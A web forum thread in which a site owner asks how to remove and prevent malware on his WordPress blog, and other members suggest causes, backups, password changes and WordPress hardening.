Malware - How Can it be Avoided?

haha, like nuns?

ohhh, you mean genitals

Wade,

sorry, couldn't resist.

hmmm, I am not an expert on malware attacks on web sites

have you searched on the name of the bug?

I can see two ways for it to get into your code

1. You put it there by using some pre-written code that has the baddie in it waiting to be activated.

2. It was injected by insecure PHP forms that allowed it to be "added" to your files.

Given the nature of the site, there is a lot of shady sh*t going on, also cutthroat competition.

Again, a search on the bug's name can help you decide how to deal with it.

Restoring your site to a backup will fix scenario #2, but you will need to evaluate your security before you are infected again. It will do nothing if you are placing the malware there yourself.

err - what does this have to do with your financial site? if you want to promote it, a link in your sig is appropriate, you may not just add a project to an unrelated post...

Also, the website the from the project you have attached in your post has malware.
I clicked the blog link on your site and was confronted with the "Attack Report Site".

So it seems more than one of your sites has been attacked. Are you using the same scripts on all sites? Perhaps a plugin in Wordpress? Or are all your sites being attacked for a reason?

Sometimes if you rub someone up the wrong way in a forum they can be vindictive and seek revenge, spamming or DOSing your site.

The site that is posted was the one that was attacked...this is the only one that that has had a problem.

It was originally on my index page, but that has been clean up, but I can not seem to get it off the blog. Like I was saying I am about to delete the blog and start fresh if I can not find a solution...

That is why I referenced this site, not as a ad, just as a reference to the site that I am having an issue with.

The plugin for word press is not the same as the other sites I have as they were done at different times.

I have changed all FTP and passwords but I would really like to know how to prevent this in the future.

Really makes me mad all the work that goes into our sites and then people do this kind of thing...

I didn't realise the site in question was the attached project.
You don't need to attach a project to reference a site, a link in the thread is fine. Also, perhaps it's worth removing the project from TWF until you get the malware issue resolved, as Google claims it has 10 malicious software exploits downloaded and installed without user consent.

Not sure why you cannot get it off the blog.
If it's not just text in articles that need deleting then it might be in a script.

But it's somewhere in the code or article or database, and looking at your scripts should allow you to delete it and find the cause.

If it's directly in the blog files (page.php, archive.php etc) then it sounds like they have managed to write to your files.
If it's in the DB somewhere then they have gained access to that. Otherwise it might just be articles.

Prevention will come when you find out where the code is, and how they did it.

You should only be able - advise you hire a good php programmer, I think it will eliminate and prevent attacks in the future, because you will pay him money for this.

There's no way to be 100% secure, but if you follow the simple guidelines for Hardening Wordpress here: http://codex.wordpress.org/Hardening_WordPress, they will help, all though they are the very VERY minimum/basics. There are many tools you can use to secure your sites.

It can be avoided by not surfing the Internet and not opening any unknown file executables.